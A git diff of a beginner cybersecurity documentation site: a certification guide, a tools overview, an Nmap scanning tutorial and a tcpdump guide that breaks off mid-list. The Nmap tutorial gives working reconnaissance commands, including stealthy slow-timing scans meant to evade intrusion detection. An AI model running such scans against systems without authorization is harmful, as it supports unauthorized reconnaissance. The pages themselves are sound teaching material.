diff --git a/docs/cybersecurity/certification-guide.mdx b/docs/cybersecurity/certification-guide.mdx index e69de29..f8ecbcb 100644 --- a/docs/cybersecurity/certification-guide.mdx +++ b/docs/cybersecurity/certification-guide.mdx @@ -0,0 +1,196 @@ +--- +title: "Cybersecurity Certification Guide" +description: "A complete guide to top cybersecurity certifications — understand their importance, levels, skills covered, and how to choose the right one for your career." +tags: [cybersecurity, certifications, learning-path, career, beginners, professionals] +--- + +If you’re serious about building a career in cybersecurity, certifications can be your **passport to credibility, skills, and global recognition**. They prove that you not only *understand* security concepts but can *apply* them in real-world scenarios. + +Whether you’re just starting out or aiming for senior-level positions, this guide will help you choose the **right cybersecurity certifications** for your goals. + +## Why Cybersecurity Certifications Matter + +In today’s job market, cybersecurity skills are in high demand, but **proving your expertise** is what makes you stand out. + +Here’s why certifications are valuable: + +* **Credibility** – Validates your knowledge and commitment. +* **Career Growth** – Many employers require or prefer certified professionals. +* **Higher Salaries** – Certified specialists often earn 15–30% more. +* **Global Recognition** – Top certifications are respected worldwide. +* **Structured Learning** – They guide your study path and practical focus. + +> In short, certifications build **trust** between you and employers, proving you can protect what matters most. + +## Certification Levels + +Cybersecurity certifications come in different **levels** based on your experience and goals: + +| Level | Audience | Focus | +|--------|-----------|--------| +| **Beginner** | Students, newcomers | Basics of networking and security | +| **Intermediate** | IT professionals | Hands-on defense and monitoring | +| **Advanced** | Experienced practitioners | Architecture, threat hunting, management | +| **Expert** | Leaders, strategists | Governance, compliance, advanced operations | + +## Top Cybersecurity Certifications (By Level) + +### Beginner-Level Certifications + +Perfect if you’re new to cybersecurity and want to build foundational skills. + +#### 1. CompTIA Security+ (SY0-701) +> The most recommended starting point for cybersecurity careers. + +* **Covers:** Network security, risk management, threats, and basic cryptography. +* **Exam Duration:** ~90 minutes +* **Cost:** ~$392 +* **Why it’s great:** Industry-recognized, entry-level certification for almost all roles. + +*Preparation Resources:* +* Official CompTIA Study Guide +* Professor Messer’s YouTube series +* Practice exams on ExamCompass + +#### 2. (ISC)² Certified in Cybersecurity (CC) +> A new free certification from $(ISC)^2$ — great for beginners. + +* **Covers:** Security principles, risk management, network security, and access control. +* **Cost:** Free (includes training and exam for members). +* **Why it’s great:** Perfect entry into the $(ISC)^2$ ecosystem (leads to CISSP). + +#### 3. Google Cybersecurity Professional Certificate +> Offered on Coursera — hands-on and beginner-friendly. + +* **Covers:** Threat detection, Linux, SIEM tools, and risk assessment. +* **Duration:** ~6 months (self-paced) +* **Why it’s great:** Teaches practical skills with real tools (Splunk, Wireshark, etc.). + +### Intermediate-Level Certifications + +For professionals with basic networking or IT experience who want to go deeper. + +#### 4. Certified Ethical Hacker (CEH) +> Learn the mindset and tools of hackers — to defend against them. + +* **Covers:** Footprinting, scanning, enumeration, exploitation, and countermeasures. +* **Cost:** ~$1,200 +* **Offered by:** EC-Council +* **Why it’s great:** Builds strong penetration testing and vulnerability analysis skills. + +:::tip +Combine CEH with hands-on practice using TryHackMe or Hack The Box. +::: + +#### 5. CompTIA Cybersecurity Analyst (CySA+) +> Focused on monitoring, threat detection, and incident response. + +* **Covers:** SIEM, threat intelligence, and security operations. +* **Why it’s great:** Bridges the gap between Security+ and more advanced certifications. + +#### 6. GIAC Security Essentials (GSEC) +> Offered by SANS Institute, focused on real-world application. + +* **Covers:** Active defense, cryptography, wireless security, and cloud defense. +* **Why it’s great:** Highly respected and technically rigorous. + +### Advanced-Level Certifications + +These certifications are for professionals aiming for senior or specialized roles. + +#### 7. Certified Information Systems Security Professional (CISSP) +> The gold standard of cybersecurity certifications. + +* **Covers:** Security architecture, risk management, asset protection, and operations. +* **Experience Required:** 5+ years (or associate level for beginners). +* **Why it’s great:** Opens doors to senior and management positions globally. + +:::tip +Study one domain at a time using official CISSP CBK (Common Body of Knowledge). +::: + +#### 8. Certified Information Security Manager (CISM) +> Focuses on governance, compliance, and managing security programs. + +* **Offered by:** ISACA +* **Covers:** Risk management, incident handling, and policy design. +* **Why it’s great:** Perfect for transitioning from technical to managerial roles. + +#### 9. Offensive Security Certified Professional (OSCP) +> The most respected certification in **ethical hacking and penetration testing**. + +* **Covers:** Exploitation, privilege escalation, and custom script development. +* **Exam:** 24-hour hands-on test. +* **Why it’s great:** Real-world performance-based test — no memorization. + +*Preparation Resources:* +* “Try Harder” Labs by Offensive Security +* PWK (Penetration Testing with Kali Linux) Course +* HackTheBox Labs + +### Expert-Level Certifications + +For professionals aiming for leadership, forensics, or global security roles. + +#### 10. Certified Information Systems Auditor (CISA) +> Focused on auditing, control, and assurance. + +* **Covers:** IT governance, risk, and audit management. +* **Why it’s great:** Ideal for auditors, consultants, and compliance officers. + +#### 11. GIAC Penetration Tester (GPEN) +> Advanced penetration testing and network exploitation certification. + +* **Why it’s great:** Deep dive into exploit development, buffer overflows, and real-world pentesting. +* **Offered by:** SANS Institute (highly regarded globally). + +#### 12. Certified Cloud Security Professional (CCSP) +> For those working in cloud environments (AWS, Azure, GCP). + +* **Covers:** Cloud data security, architecture, and compliance frameworks. +* **Why it’s great:** Essential for modern organizations moving to the cloud. + +## Choosing the Right Certification Path + +Here’s a roadmap-style view based on your career goals: + +| Goal | Recommended Certifications | +|-------|-----------------------------| +| **IT or Network Admin → Security** | CompTIA Security+, CySA+, CC | +| **Ethical Hacker / Pen Tester** | CEH, OSCP, GPEN | +| **Security Management / Leadership** | CISSP, CISM, CISA | +| **Cloud Security Specialist** | CCSP, AWS Security, Azure SC-100 | +| **Incident Response / Threat Hunter** | GCIH, CySA+, GCFA | +| **Forensics Expert** | CHFI, GCFE, EnCE | + +## Free & Low-Cost Learning Resources + +| Platform | Focus Area | Notes | +|-----------|-------------|--------| +| **TryHackMe** | Hands-on hacking labs | Beginner to pro levels | +| **Hack The Box** | Real-world pentesting practice | Advanced and practical | +| **Coursera / edX** | Theory and foundational learning | Free with optional certificates | +| **Cybrary** | Security learning paths | Offers Security+, CEH, CISSP courses | +| **INE** | Networking and penetration testing | OSCP and Cisco prep | +| **YouTube** | Free tutorials | Search for *John Hammond*, *NetworkChuck*, *Professor Messer* | + + +:::tip Tips for Certification Success + +1. **Plan your study schedule** – Consistency beats cramming. +2. **Use real labs** – Practice on virtual machines, CTFs, or simulation tools. +3. **Join study groups** – Discussing with peers improves understanding. +4. **Focus on concepts, not memorization** – Especially for practical exams like OSCP. +5. **Take mock exams** – Familiarize yourself with exam patterns. +6. **Keep your notes** – Use digital notebooks like Obsidian or Notion. +7. **Stay updated** – Cyber threats evolve, so continuous learning is key. + +::: + +## Final Thoughts + +Cybersecurity certifications are **not just badges**, they’re **milestones** of your growth. Each one represents a new level of understanding and professional maturity. + +> “Certifications don’t make you an expert, they make you disciplined.” + +So, choose a path, start learning, and keep building both your knowledge and your reputation in the world of cybersecurity. \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools.mdx b/docs/cybersecurity/cybersecurity-tools.mdx deleted file mode 100644 index d01a307..0000000 --- a/docs/cybersecurity/cybersecurity-tools.mdx +++ /dev/null @@ -1,283 +0,0 @@ ---- -title: "Cybersecurity Tools" -description: "Explore the essential tools used by cybersecurity professionals for scanning, testing, monitoring, and securing systems." -tags: [cybersecurity, tools, ethical-hacking, network-security, penetration-testing] ---- - -In the world of **Cybersecurity**, the right tools can make the difference between **detecting an attack early** and **falling victim to it**. Professionals rely on specialized software to analyze, test, and protect systems from potential threats. - -This guide introduces you to the most popular and effective cybersecurity tools, grouped by their core purpose, so you can understand what each one does and why it’s used. - ---- - -## 🕵️1. Network Scanning & Analysis Tools - -These tools help you **discover devices**, **analyze traffic**, and **identify vulnerabilities** in a network. - -### Nmap (Network Mapper) -> *The Swiss Army knife of network scanning.* - -* Used to scan networks, find open ports, detect services, and identify operating systems. -* Great for reconnaissance and vulnerability assessment. - -**Example usage:** - -```bash -nmap -sV 192.168.1.1 -``` - -👉 This command scans a system to find running services and their versions. - ---- - -### Wireshark - -> *The most powerful packet analyzer.* - -* Captures and inspects network traffic in real-time. -* Helps you understand what data is moving through your network. -* Often used to detect suspicious activities or data leaks. - -**Use Case:** -When analyzing network intrusions, Wireshark helps identify abnormal packets or malicious communication patterns. - ---- - -### Angry IP Scanner - -> *A simple and fast IP address scanner.* - -* Lightweight and beginner-friendly. -* Scans IP ranges and ports quickly. -* Useful for identifying connected devices within a local network. - ---- - -## 2. Vulnerability Assessment Tools - -These tools help identify weaknesses before attackers do. - -### **OpenVAS** - -> *An open-source vulnerability scanning system.* - -* Scans for thousands of known vulnerabilities. -* Generates detailed reports and risk scores. -* Useful for network admins and security auditors. - ---- - -### Nessus - -> *One of the most widely used vulnerability scanners.* - -* Detects misconfigurations, missing patches, and software vulnerabilities. -* Provides remediation suggestions. -* Used by both enterprises and individual ethical hackers. - ---- - -## 3. Penetration Testing & Exploitation Frameworks - -Used by ethical hackers to simulate attacks and test system defenses. - -### Metasploit Framework - -> *The ultimate toolkit for ethical hacking.* - -* Allows you to exploit vulnerabilities in a controlled environment. -* Includes hundreds of pre-built exploits and payloads. -* Ideal for penetration testing, learning exploitation techniques, and testing patch effectiveness. - -**Example workflow:** - -1. Identify a vulnerability. -2. Use a Metasploit module to exploit it. -3. Gain controlled access (for testing and reporting). - ---- - -### Burp Suite - -> *The hacker’s browser companion.* - -* Focuses on **Web Application Security**. -* Intercepts HTTP requests and responses. -* Useful for finding vulnerabilities like XSS, SQL Injection, and CSRF. - -**Burp Suite Editions:** - -* 🧩 Community (Free) -* ⚙️ Professional (Paid, used in bug bounty and enterprise testing) - ---- - -### Aircrack-ng - -> *The go-to suite for Wi-Fi network testing.* - -* Used to crack Wi-Fi passwords and test wireless encryption. -* Supports packet capture, replay attacks, and WEP/WPA/WPA2 analysis. - -**Note:** Always test *only* on networks you own or have permission to test. - ---- - -## 4. Monitoring & Intrusion Detection Tools - -Used for continuous observation and alerting of suspicious network activity. - -### Snort - -> *A powerful open-source intrusion detection and prevention system.* - -* Monitors network traffic for suspicious patterns. -* Can block or alert admins of malicious packets. -* Maintained by Cisco. - ---- - -### Suricata - -> *An advanced network threat detection engine.* - -* Similar to Snort but supports multi-threading for better performance. -* Detects intrusions, logs network events, and monitors traffic in real-time. - ---- - -### OSSEC - -> *Host-based Intrusion Detection System (HIDS).* - -* Monitors system logs, file changes, and rootkit attempts. -* Sends alerts for unauthorized activities. -* Works on Windows, Linux, and macOS. - ---- - -## 5. Password Cracking & Security Tools - -These tools are used by ethical hackers to **test password strength** and recover lost credentials. - -### John the Ripper - -> *A fast password cracking tool.* - -* Tests password strength by using dictionary and brute-force attacks. -* Commonly used in penetration tests to identify weak credentials. - ---- - -### Hydra - -> *Network login cracker.* - -* Supports various protocols like FTP, SSH, HTTP, and SMB. -* Useful for testing login systems for brute-force vulnerabilities. - ---- - -### Hashcat - -> *One of the fastest and most advanced password recovery tools.* - -* GPU-accelerated for high-speed cracking. -* Supports various hash types (MD5, SHA, bcrypt, etc.). -* Often used in digital forensics and penetration testing. - ---- - -## 6. Security & SIEM Platforms - -Used by enterprises to **collect, analyze, and respond to security events**. - -### Splunk - -> *Data-driven security monitoring platform.* - -* Collects and analyzes logs from multiple systems. -* Provides real-time dashboards and alerts. -* Commonly used in Security Operations Centers (SOCs). - ---- - -### ELK Stack (Elasticsearch, Logstash, Kibana) - -> *Open-source alternative to Splunk.* - -* Elasticsearch: Stores and searches logs. -* Logstash: Collects and processes logs. -* Kibana: Visualizes data through dashboards. - -Together, they form a robust solution for **log management and security analytics**. - ---- - -## 7. Digital Forensics & Incident Response (DFIR) - -Used to **analyze breaches**, **gather evidence**, and **recover data** after an attack. - -### Autopsy - -> *A digital forensics platform.* - -* Recovers deleted files, analyzes drives, and investigates breaches. -* Often used by law enforcement and cybersecurity experts. - ---- - -### Volatility - -> *Memory forensics framework.* - -* Analyzes RAM dumps to identify malware, hidden processes, and active network connections. -* Useful for post-incident investigations. - ---- - -## 8. Encryption & Privacy Tools - -Protect sensitive data and communication from unauthorized access. - -### VeraCrypt - -> *Secure encryption for files and drives.* - -* Creates encrypted volumes to protect confidential data. -* Simple UI — great for beginners and professionals alike. - ---- - -### Tor Browser - -> *Browse the web anonymously.* - -* Routes traffic through multiple servers to hide your identity. -* Used for privacy-focused browsing and security research. - ---- - -## Summary - -| Category | Key Tools | Purpose | -| ---------------------- | ------------------------ | ---------------------------- | -| Network Analysis | Nmap, Wireshark | Discover and inspect traffic | -| Vulnerability Scanning | OpenVAS, Nessus | Detect system weaknesses | -| Penetration Testing | Metasploit, Burp Suite | Simulate attacks | -| Intrusion Detection | Snort, Suricata | Monitor and alert | -| Password Testing | John the Ripper, Hashcat | Assess credential security | -| Forensics | Autopsy, Volatility | Investigate incidents | -| Encryption | VeraCrypt, Tor | Protect and anonymize data | - ---- - -## Final Thoughts - -Cybersecurity tools are powerful allies — but remember, **tools don’t make you a professional**. -Understanding *how and why* to use them responsibly is what truly matters. - -> “A skilled security professional isn’t defined by the tools they use, -> but by the way they think.” - -So, explore, experiment, and practice — always with ethics and permission. \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/digital-forensics/autopsy-introduction.mdx b/docs/cybersecurity/cybersecurity-tools/digital-forensics/autopsy-introduction.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/digital-forensics/autopsy-introduction.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/digital-forensics/volatility-memory-analysis.mdx b/docs/cybersecurity/cybersecurity-tools/digital-forensics/volatility-memory-analysis.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/digital-forensics/volatility-memory-analysis.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/index.mdx b/docs/cybersecurity/cybersecurity-tools/index.mdx new file mode 100644 index 0000000..db1faef --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/index.mdx @@ -0,0 +1,129 @@ +--- +title: "Cybersecurity Tools" +description: "Explore essential cybersecurity tools used for network analysis, penetration testing, digital forensics, and defense. Learn how each tool strengthens modern security operations." +tags: [cybersecurity, tools, ethical-hacking, network-security, penetration-testing] +--- + +Welcome to the **Cybersecurity Tools** section, your complete guide to the essential software and frameworks used by professionals to **analyze, test, protect, and monitor** digital systems. + +Cybersecurity isn’t just about theory — it’s about **hands-on tools** that bring those concepts to life. From discovering network vulnerabilities to defending against live attacks, every tool plays a unique role in keeping systems secure. + +## Why Learning Cybersecurity Tools Matters + +Imagine being a mechanic who knows how a car works but doesn’t know how to use a wrench or a diagnostic tool — you’d be limited, right? +The same applies in cybersecurity. + +Understanding tools helps you: +* **Detect** and analyze vulnerabilities faster. +* **Simulate real-world attacks** ethically to strengthen defenses. +* **Automate repetitive tasks**, like scanning or monitoring. +* **Respond to incidents** effectively during security breaches. + +Whether you’re an ethical hacker, analyst, or developer — mastering these tools will give you a solid edge in this field. + +## Categories of Cybersecurity Tools + +Cybersecurity tools can be grouped into several key categories. Let’s look at what each one covers: + +### 1. Network Analysis Tools + +Network analysis tools help you understand **how data flows** through a system — who’s talking to whom, what’s being sent, and where the vulnerabilities lie. + +**Common Tools:** +* **Wireshark** – Captures and analyzes network packets in real time. +* **Nmap** – Scans networks to find active hosts and open ports. +* **Tcpdump** – Command-line tool for traffic monitoring and debugging. + +These tools are vital for identifying intrusions, sniffing suspicious traffic, and auditing your network’s health. + +Learn More → `network-analysis/wireshark-basics` + +### 2. Penetration Testing Tools + +Penetration testing (or **ethical hacking**) tools are used to simulate attacks, the same way a hacker would to expose weaknesses before real attackers do. + +**Common Tools:** +* **Metasploit Framework** – Exploitation toolkit for penetration testers. +* **Burp Suite** – Web application security testing suite. +* **Nikto** – Scans web servers for outdated software and misconfigurations. + +These tools are like the “X-ray” for your digital systems — revealing what’s hidden underneath. + +Learn More → `penetration-testing/metasploit-framework` + +### 3. Password & Authentication Tools + +Passwords are often the **first line of defense** — and one of the weakest. +These tools test and strengthen password security through cracking, auditing, and encryption checks. + +**Common Tools:** +* **John the Ripper** – Password cracking and auditing tool. +* **Hydra** – Brute-force attack tool for testing login systems. +* **Hashcat** – GPU-based password recovery and hash analysis tool. + +Learning these tools helps ethical hackers and admins assess password strength and enforce better authentication policies. + +Learn More → `password-and-authentication/john-the-ripper` + +### 4. Digital Forensics Tools + +When a cyber incident happens, **digital forensics** tools help uncover what really went wrong — analyzing logs, memory dumps, and disk data. + +**Common Tools:** +* **Autopsy** – Digital investigation tool for analyzing hard drives and memory. +* **Volatility** – Memory forensics framework for RAM analysis. + +They’re like the **detectives of the digital world** — uncovering the traces left behind by attackers. + +Learn More → `digital-forensics/autopsy-introduction` + +### 5. Vulnerability Assessment Tools + +These tools automatically **scan systems, websites, or networks** for known weaknesses and misconfigurations — helping organizations patch before exploitation. + +**Common Tools:** +* **OpenVAS** – Open-source vulnerability scanning framework. +* **Nessus** – Professional-grade vulnerability assessment tool. +* **Nikto** – Web scanner for outdated or insecure configurations. + +They are essential for proactive defense and compliance audits. + +Learn More → `vulnerability-assessment/openvas-setup` + +### 6. Monitoring & Defense Tools + +Once systems are deployed, **monitoring and defense** tools continuously track network activity, detect threats, and alert security teams to unusual behavior. + +**Common Tools:** +* **Splunk** – SIEM tool for log analysis and real-time monitoring. +* **Snort** – Intrusion Detection System (IDS) for traffic analysis. +* **Security Onion** – Linux distro for security monitoring and threat hunting. + +They keep the watchtower up and running — making sure defenders always stay one step ahead. + +Learn More → `monitoring-and-defense/splunk-overview` + +## Choosing the Right Tool + +Not every tool fits every job — the right choice depends on: +* **Your goal:** Testing, analyzing, monitoring, or responding. +* **Your environment:** Web apps, networks, or cloud systems. +* **Your skill level:** Some tools are beginner-friendly, others need command-line expertise. + +Start small — experiment with open-source tools like Wireshark or Metasploit in a **safe lab environment** (like Kali Linux or a virtual machine). + +## What You’ll Learn Next + +In the upcoming sections, we’ll dive deeper into: +* Step-by-step tutorials for each tool. +* Real-world use cases. +* Ethical hacking best practices. +* Setup and configuration examples. + +You’ll gain not only **knowledge of tools**, but also **the wisdom to use them responsibly** — a key trait of every great cybersecurity professional. + +:::note + +Always use these tools **ethically** and with proper authorization. Practicing on systems without permission is illegal and against cybersecurity ethics. + +::: \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/monitoring-and-defense/security-onion.mdx b/docs/cybersecurity/cybersecurity-tools/monitoring-and-defense/security-onion.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/monitoring-and-defense/security-onion.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/monitoring-and-defense/snort-ids.mdx b/docs/cybersecurity/cybersecurity-tools/monitoring-and-defense/snort-ids.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/monitoring-and-defense/snort-ids.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/monitoring-and-defense/splunk-overview.mdx b/docs/cybersecurity/cybersecurity-tools/monitoring-and-defense/splunk-overview.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/monitoring-and-defense/splunk-overview.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/network-analysis/nmap-scanning.mdx b/docs/cybersecurity/cybersecurity-tools/network-analysis/nmap-scanning.mdx new file mode 100644 index 0000000..1470a0b --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/network-analysis/nmap-scanning.mdx @@ -0,0 +1,237 @@ +--- +title: "Nmap Scanning Basics" +description: "Learn how to use Nmap for network discovery, port scanning, service/version detection, OS fingerprinting, and safe scanning practices." +tags: [nmap, network-analysis, cybersecurity, tools, port-scanning] +--- + +Nmap (Network Mapper) is the go-to tool for discovering hosts, probing open ports, and gathering service/version and OS information. It’s simple to start with and deep enough to support advanced reconnaissance, a must-have in any security toolkit. + +This guide teaches the most useful Nmap scan types, practical command examples, how to interpret results, and responsible scanning etiquette. + +## Why Use Nmap? + +Nmap helps you discover: +* Which hosts are *alive* on a network (host discovery) +* Which **ports** are open and what **services** run on them +* Software versions and possible vulnerabilities (via scripts) +* The **operating system** of a host (OS fingerprinting) + +Think of Nmap as the first step a security professional takes to map the attack surface. + +## Installing Nmap + +* **Linux (Debian/Ubuntu):** + ```bash + sudo apt update + sudo apt install nmap -y + ``` + +* **macOS (Homebrew):** + + ```bash + brew install nmap + ``` + +* **Windows:** Download the installer from the official Nmap site and follow the wizard (it installs Npcap as well). + +## Basic Scan Types & When to Use Them + +### 1. Ping Scan — Find live hosts + +Quickly check which IPs are up (no port scan): + +```bash +nmap -sn 192.168.1.0/24 +``` + +Use when you want a list of responsive hosts on a subnet. + +### 2. TCP Connect Scan (`-sT`) — Reliable, works without privileges + +Performs a full TCP handshake for each port. Good when you don’t have raw-socket privileges: + +```bash +nmap -sT 10.0.0.5 +``` + +Slower and noisier than SYN scan, but universally supported. + +### 3. SYN Scan (`-sS`) — Fast and stealthier (requires root on UNIX) + +Sends SYN and analyzes responses without completing the handshake: + +```bash +sudo nmap -sS 10.0.0.5 +``` + +Common default for stealthy discovery — often used in pentesting labs. + +### 4. Version Detection (`-sV`) — Identify services & versions + +Probes open ports to determine which service and version is running: + +```bash +sudo nmap -sV 10.0.0.5 +``` + +Useful to prioritize vulnerabilities (older versions are more likely vulnerable). + +### 5. OS Fingerprinting (`-O`) — Guess the operating system + +Attempts to identify OS from network responses: + +```bash +sudo nmap -O 10.0.0.5 +``` + +Accuracy varies; combine with other data for confidence. + +### 6. Aggressive Scan (`-A`) — Combined info (use carefully) + +Shortcut to run scans for service/version detection, OS detection, script scanning, and traceroute: + +```bash +sudo nmap -A 10.0.0.5 +``` + +Great for lab environments — noisy on production networks. + +## Useful Options & Flags + +| Option | Purpose | +| ----------------- | ----------------------------------------------------------------------- | +| `-p` | Specify port or range — e.g. `-p 22,80,443` or `-p 1-65535` | +| `--top-ports N` | Scan top N most common ports (faster) | +| `-T0..-T5` | Timing template (0 slowest, 5 fastest / loudest) | +| `-Pn` | Skip host discovery (treat hosts as up) | +| `-oN / -oX / -oG` | Output formats: normal, XML, grepable | +| `--open` | Show only open ports in output | +| `-v` / `-vv` | Verbose output (more details) | +| `--script ` | Run Nmap Scripting Engine (NSE) scripts (e.g., `--script http-headers`) | +| `--script vuln` | Run vulnerability-related NSE scripts | + +Examples: + +```bash +# Scan top 100 ports, show only open, faster timing: +sudo nmap --top-ports 100 --open -T4 10.0.0.5 + +# Full port range with version detection and scripts: +sudo nmap -p 1-65535 -sV --script vuln 10.0.0.5 +``` + +## Nmap Scripting Engine (NSE) + +NSE adds powerful scripted checks — from simple info-gathering to complex vulnerability detection. Run specific script categories: + +* `--script default` → safe default scripts +* `--script vuln` → vulnerability scanning scripts +* `--script discovery` → extra discovery helpers + +Example: + +```bash +sudo nmap -sV --script vuln 192.168.1.10 +``` + +:::warning +Some NSE scripts can be intrusive. Use with permission. +::: + +## Timing & Stealth + +Timing controls (`-T0` to `-T5`) let you balance speed vs detectability: + +* `-T0` / `-T1` — very slow; useful to avoid IDS triggers +* `-T3` — default, balanced +* `-T4` / `-T5` — fast but noisy; avoid on production + +Use `-sS` (SYN) + `-T1` for stealth; use `-sT` + `-T4` for quick scans where stealth isn’t required. + +## Output & Reporting + +Save scans for later: + +```bash +# Normal text +nmap -sV 10.0.0.5 -oN result.txt + +# XML (useful for automation) +nmap -sV 10.0.0.5 -oX result.xml + +# Grepable output +nmap -sV 10.0.0.5 -oG result.gnmap +``` + +Combine outputs to feed other tools or reports. + +## Practical Examples & Workflows + +### Quick host discovery + top ports: + +```bash +nmap -sn 192.168.1.0/24 +nmap --top-ports 50 --open 192.168.1.23 +``` + +### Web server fingerprint + common scripts: + +```bash +sudo nmap -p 80,443 -sV --script http-headers,http-title 203.0.113.5 +``` + +### Full reconnaissance (lab use only): + +```bash +sudo nmap -A -p 1-65535 203.0.113.5 -oN full_recon.txt +``` + +### Targeted service check (SSH): + +```bash +nmap -p 22 --script sshv1,ssh-hostkey 10.0.0.5 +``` + +## Interpreting Results — Quick Guide + +* **open** — a service responded (attack surface) +* **closed** — port reachable but no service listening +* **filtered** — packets were blocked (firewall/ACL) +* **unfiltered** — port reachable but Nmap cannot determine open/closed (less common) +* **open|filtered** — Nmap cannot distinguish (common for UDP) +* **closed|filtered** — similar ambiguity in UDP/TCP scans + +If a port is `open` and the service version is old, prioritize it for further testing (with permission). + +## Legal & Ethical Scanning + +Nmap is powerful and scanning other people's networks without permission can be illegal. + +* **Scan only systems you own or have written permission for** (e.g., lab, client with scope). +* **Respect time windows and scope limits** in engagement contracts. +* **Do not** run aggressive scans against unknown live infrastructure. + +Always get explicit permission and document your scope. + +## Hands-On Lab Ideas + +1. **Local Subnet Discovery:** + `nmap -sn 192.168.1.0/24` — identify all live hosts on your home LAN. + +2. **Service Identification:** + Host a small web app on a VM and run: `sudo nmap -sV -p 80,443 ` — inspect server banners. + +3. **NSE Practice:** + Run safe discovery scripts: `sudo nmap --script discovery 192.168.56.0/24` on an isolated lab. + +4. **Timing & IDS:** + Compare `-T1` vs `-T4` scans against a test host and observe logs on a local IDS (like Snort) to see how scan speed affects detection. + +## Best Practices Summary + +* Start with **non-intrusive scans** (`-sn`, `--top-ports`) to map targets. +* Use **version detection** (`-sV`) to prioritize further testing. +* Run **NSE scripts** carefully; know which are intrusive. +* Adjust **timing (`-T`)** to avoid tripping alarms in production. +* Save outputs (`-oN`, `-oX`) for reporting and auditing. +* **Always gain permission** before scanning networks you don’t own. \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/network-analysis/tcpdump-guide.mdx b/docs/cybersecurity/cybersecurity-tools/network-analysis/tcpdump-guide.mdx new file mode 100644 index 0000000..cb5a297 --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/network-analysis/tcpdump-guide.mdx @@ -0,0 +1,229 @@ +--- +title: "Tcpdump Guide" +description: "Practical guide to using tcpdump for packet capture and quick network forensics — capture syntax, common filters, writing/reading pcap files, and safe lab exercises." +tags: [tcpdump, network-analysis, packet-capture, cybersecurity, tools] +--- + +**tcpdump** is a lightweight, command-line packet sniffer that every network engineer and security analyst should know. It’s fast, scriptable, and perfect for quick captures or when you don’t have a GUI available. This guide shows how to capture, filter, save, and analyze packets effectively — without drowning in noise. + +:::note +tcpdump reads raw packets from the network interface and therefore usually requires root privileges (or membership in a capture-capable group). Run commands responsibly and only on networks you own or are authorized to test. +::: + +## When to use tcpdump + +* Fast troubleshooting on remote servers (no GUI). +* Quick packet capture to hand off to analysts or to open later in Wireshark. +* Lightweight scripting/automation of capture tasks. +* Forensics when disk/CPU impact must be minimal. + +## Basic Usage & Anatomy + +The simplest capture (listen on interface `eth0` and print packets to console): + +```bash +sudo tcpdump -i eth0 +``` + +Key flags you’ll use often: + +* `-i ` — interface to capture on (e.g., `eth0`, `wlan0`, `any`). +* `-w ` — write raw packets to a pcap file (binary), use `.pcap` or `.pcapng`. +* `-r ` — read packets from a pcap file. +* `-n` — don’t resolve IPs to hostnames (faster & cleaner). +* `-nn` — don’t resolve ports to names either (shows numeric ports). +* `-s ` — snapshot length (how many bytes of each packet to capture). `-s 0` captures full packets. +* `-c ` — capture only `` packets then stop. +* `-vvv` — very verbose output (more packet detail). +* `-X` — show packet payload in hex + ASCII. +* `-A` — show packet payload in ASCII (useful for HTTP). +* `-S` — show absolute TCP sequence numbers. +* `-tttt` — timestamp with readable format (good for reports). + +**Example:** capture 200 packets on `eth0`, full packets, no name resolution, save to `capture.pcap`: + +```bash +sudo tcpdump -i eth0 -nn -s 0 -c 200 -w capture.pcap +``` + +## Capture Filters (BPF) — reduce noise at capture time + +tcpdump uses **BPF (Berkeley Packet Filter)** syntax to tell the kernel which packets to copy to user-space. These filters are applied *during capture* (efficient). + +Some useful patterns: + +* By host: + + ```bash + sudo tcpdump -i eth0 host 192.168.1.10 + ``` +* Source or destination: + + ```bash + sudo tcpdump -i eth0 src 10.0.0.5 + sudo tcpdump -i eth0 dst 8.8.8.8 + ``` +* By network: + + ```bash + sudo tcpdump -i eth0 net 192.168.1.0/24 + ``` +* By protocol/port: + + ```bash + sudo tcpdump -i eth0 tcp port 22 # SSH + sudo tcpdump -i eth0 udp and port 53 # DNS + sudo tcpdump -i eth0 portrange 8000-9000 + ``` +* Combined expressions: + + ```bash + sudo tcpdump -i eth0 'host 10.0.0.5 and (tcp port 80 or tcp port 443)' + ``` +* Negation: + + ```bash + sudo tcpdump -i eth0 'not net 10.0.0.0/8' + ``` + +:::tip +Wrap complex filters in single quotes to avoid shell expansion. Capture filters are *not* the same as Wireshark display filters, they are more performance-friendly. +::: + +## Writing & Rotating Capture Files + +Large captures can fill disks quickly. Use ring-buffer options to manage files: + +* Basic write: + + ```bash + sudo tcpdump -i eth0 -w /tmp/capture.pcap -s 0 + ``` + +* Rotate by size (`-C`) and keep `-w` pattern: + + ```bash + sudo tcpdump -i eth0 -s 0 -w /tmp/capture-%Y%m%d-%H%M%S.pcap -C 100 + ``` + + (Note: Some tcpdump builds require `-W` with `-C`; check `man tcpdump`.) + +* Rotate by time with `-G` (create a new file every N seconds): + + ```bash + sudo tcpdump -i eth0 -s 0 -w /tmp/capture-%Y%m%d-%H%M%S.pcap -G 3600 + ``` + + This creates hourly files. + +* 